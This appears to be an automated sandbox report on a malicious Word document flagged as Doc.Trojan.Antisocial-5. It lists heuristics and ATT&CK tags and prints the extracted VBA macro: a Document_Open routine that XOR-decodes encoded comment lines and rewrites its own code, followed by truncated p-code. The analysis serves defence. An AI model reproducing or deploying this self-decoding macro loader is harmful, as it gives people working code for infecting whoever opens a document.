Verdict: MALICIOUS
Risk Score: 180

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic; T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros. The 'Document_Open' macro is present and attempts to deobfuscate and execute code. The deobfuscated code is truncated, but the overall structure suggests it's designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Trojan.Antisocial-5' further supports its malicious nature.
Heuristics (3)
- ClamAV: Doc.Trojan.Antisocial-5 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Trojan.Antisocial-5
- VBA macros detected [medium, OLE_VBA_MACROS, 1 related finding]: Document contains VBA macro code
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8312 bytes |

SHA-256: a78b7e95d1ac6714af8414e911d9554a08b1faf4a3a5fc11f505dd64dd50ab15

Detection: ClamAV: Doc.Trojan.Antisocial-5
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Application.EnableCancelKey = wdCancelDisabled
For V1 = 16 To 34
V2 = Null
V3 = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(V1, 1))
V4 = Asc((Mid(V3, 2, 1))) Xor Asc((Mid(V3, 3, 1)))
For V5 = 5 To Len(V3) Step 2
V6 = Asc(Mid(V3, V5, 1)) Xor V4
V2 = V2 & Chr(V6)
Next
ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine V1, V2
Next
Demo
End Sub
Private Function Demo()
'½¸¡Jakd%Ì@$wÉwÕj¾w+%|Wà`Ðvspöhâ`-%óKq`•}Ëq,
'¤ cB«k°v[$_EÙ$Ø9£$û5ë2S$»PúkW$—780þ
'·¶ C7!7<Ò!`B+ibsu)cHóoúuz)^)DSEo°e|!|+¿!i33O3J(¢!2*†!ê2[2Ï(u(a
'íë¬E€&6;�&»Dë&Ú &&™.ìR€n·o�u“B‡ioezs\k-cWhúr.(wPrD�VCtŠiZl¬c™eCrñ(²P‘DwE8iÏk‡vÈi¥hÙc%hOr1u8(jO=r!c˜k².™7Ø/3(KE·i…bpcBK½iïb–s4jÉcz(‡JŽoOhjc6u£.FGî*6&ƒ7]/â/Ç
'][YB4&';h&ÐObhUr‹.YTlh*bŒ.N/à&£,È&î>j/™&2-&|7ö
':2ªNngBz‹(QMý(=5'(m9š(í\˜g{(ÝDØm¶fÁ þKl!Ž
'|zH@~&™;Õ&™G u’eS.ªK�o¸bå.sEd*b&BC–*R&¢7q/ã/‹&K^¸iÆt©&ÎBD
'ÔÖõ@/".?Ñ"u@‡";$:"GA+j¿p—*�DQ+ˆ"Æ$È"yAéjÆp4*K¿l$v€*z*^PûlÓf»"}(Ä"^0p0�0ò+;"°)n"81J12+�+õ
'™�øJQau|xp_$�A?
'“›œ\ê`²a‚{ºL/gÈk¼}�eCmRfi|Ï&,^“JÉXÒzigøbÓm¶ké|ã&}^<JôKÒg»ezx$gFfEm’f{|8{^&¯AÝ|�mJeè s9h!Ì&QK„gUläm¨Etgwlà}£dïm“&jZámZxZdHink!mÅDÛa^f½mz(ÕIÅ$‚(2*|/l*¾(f.Ò(BJ¤
'õ÷ñL:gûzv¥"éC
'WP1H‚wÉsWnuhyi•t])¢QOn2uçr9t±WèuThósÜb‚dŽsËnÚhuiL'i:|'BAªf7kNtºb�
'IA‰G!x |aaÈgæf×{H&9[#iB~tmJFúgâz¢eÂiAdZX'zØgÎeÐxj|…(œ5Ó(žNNiOdq{ mm
'–’ K,tšpNmökðjýwÛ*{GÓküjZbGm»v$ilGºk9j9raayv�wfmbkÔjewt$z9Û${BÁe³h{wóa°
'“‘¢VÇF†"é?_"µVæj_krq$FbmûaÊw¡o§g\l‘vÑ,ßT5@™R}p1m…h¼g�a{vò,ûT¤@—A©m4oIr_m%lBg~lšvœqÎ,*K{v.gfo¦*“3¥+j,êAËm f€gÃOEm.fWwÉnôgm,¸NÐk(lÑgŒqN*¦3ê.ò"²V$j³k÷q#Fôm1abw¢oÔg)l-vž,fT|@’RÃp…mhh1g{a vÊ,¡T±@ÔA}mÑoÁrºmÃlKgÌl0vXqó,×KQvIgUoî*Z3Y+¿,´AÌmÉfegØOÀmçfRwpn›go,NA¡m¬w?l.vMÛd¯N kJlŽgùqË+u
'Œ‰¶L)c°%èQlm;l vÌApj|fÆp�hÀ`‘kGq^%48ú%_DªfeqÞlgsÑ`GAcj1fŽp…h¥`'kgq?%iQÉm¬`ökØ%›V§`Kqé%gQ¦d¥wËb¿`¹qÉ%Z8›%’Kžj_w}hndøi”Q¢`ˆh(uti?d²qC`L%t@6i©v¼`‚%~Vk`¼qP%*Qåd*w†bÅ`Èq×%O8‰%áDØf|q‡lnsX`ÔA™j˜f¬p4h¾`Zk-q^
'öõ°WqbsqidPfPw~-ªUVA¹S£q¦l2i*fC`Wwy-¢U`AÚ@èl•nws!lXmEf°múwfpV-äJ=wŸf§n¨+»2Ý*6-x@×l\g·fxNÚl�gÚvQoÃfè-QGûf÷oâf•w±f†OCj¯m©fÞpr#,2‘/-#tW…bcq÷d#f±w©-—U'AÀSfqúlaiqfh`owU-¤U¼A\@ l¡nüsïlXmÔfËm{w¬pŽ-�J>wøfHn£+¸29*±-Ä@Îl€g3f�N l.g|v;oAff-ü@§l^v}m‰w/L†e‚Oòj]mGf‘pm
'’–ZP/e¯vqcšaäp~*¤RuF-T9vAkAnÉa[g?p**ºRÜF“GÒkûi•t0k«jja^j¸pzwv*NMãpBazi¨,š5Â-<*iG"kÎ`íacISkô`Jq}hqai*úE¡`•`>Bèv'kÐiÀWWpòvˆmÁjycT$¦P›@‡
'±¶/FCd7s,nšqõbSCmhæd‹rTjÝb0i>s÷)ÚT×fþqVb´F«tø'~A-nãkEbXI§frj–bì=š:öFÊdzsÈn qƒb+C)hqd}rrjbHi�sC)øA]r.kÓk¾IXfÐjâbû
End Function
' Processing file: /opt/analyzer/scan_staging/946bd42b49ec49f68834c28cb7ba0c86.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 138154 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #2:
' StartForVariable
' Ld V1
' EndForVariable
' LitDI2 0x0010
' LitDI2 0x0022
' For
' Line #3:
' LitVarSpecial (Null)
' St V2
' Line #4:
' Ld V1
' LitDI2 0x0001
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' Paren
' St V3
' Line #5:
' Ld V3
' LitDI2 0x0002
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' Paren
' ArgsLd Asc 0x0001
' Ld V3
' LitDI2 0x0003
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' Paren
' ArgsLd Asc 0x0001
' Xor
' St V4
' Line #6:
' StartForVariable
' Ld V5
' EndForVariable
' LitDI2 0x0005
' Ld V3
' FnLen
' LitDI2 0x0002
' ForStep
' Line #7:
' Ld V3
' Ld V5
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' ArgsLd Asc 0x0001
' Ld V4
' Xor
' St V6
' Line #8:
' Ld V2
' Ld V6
' ArgsLd Chr 0x0001
' Concat
' St V2
' Line #9:
' StartForVariable
' Next
' Line #10:
' Ld V1
' Ld V2
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' MemLd VBComponents
' Args
... (truncated)